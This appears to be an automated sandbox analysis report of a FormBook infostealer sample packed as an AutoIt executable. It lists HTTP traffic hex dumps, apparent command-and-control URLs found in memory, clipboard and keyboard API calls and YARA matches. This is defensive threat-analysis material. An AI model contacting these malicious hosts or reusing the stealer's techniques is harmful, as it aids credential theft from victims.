09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 17:04:42 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 17:04:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 17:04:47 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 17:04:50 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;

Source: prevhost.exe, 00000005.00000002.3316055880.0000000005DE8000.00000004.10000000.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315842528.0000000003AB8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://pku-cs-cjw.top/o8v1/?gjR=aBBw/QY72agee
Source: YZKoIsKkwLJWPq.exe, 00000006.00000002.3317083963.000000000583E000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.vilakodsiy.sbs
Source: YZKoIsKkwLJWPq.exe, 00000006.00000002.3317083963.000000000583E000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.vilakodsiy.sbs/w7eo/
Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: prevhost.exe, 00000005.00000002.3314429519.0000000003244000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: prevhost.exe, 00000005.00000002.3314429519.0000000003244000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: prevhost.exe, 00000005.00000002.3314429519.0000000003244000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: prevhost.exe, 00000005.00000002.3314429519.0000000003244000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: prevhost.exe, 00000005.00000002.3314429519.0000000003244000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: prevhost.exe, 00000005.00000002.3314429519.0000000003244000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: prevhost.exe, 00000005.00000003.2577103123.00000000080C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_0058EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0058EAFF

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_0058ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0058ED6A

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

0_2_0058EAFF

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_0057AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0057AA57

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_005A9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_005A9576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.24e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3314303554.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3315298026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2392864199.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2393158045.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3315173119.0000000004CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2393615856.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3315527275.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: 4sfN3Gx1vO.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 4sfN3Gx1vO.exe, 00000000.00000000.2057094134.00000000005D2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8a3cfb43-7
Source: 4sfN3Gx1vO.exe, 00000000.00000000.2057094134.00000000005D2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_b9966eb8-5
Source: 4sfN3Gx1vO.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_fff98f22-6
Source: 4sfN3Gx1vO.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_6dcf58ab-1

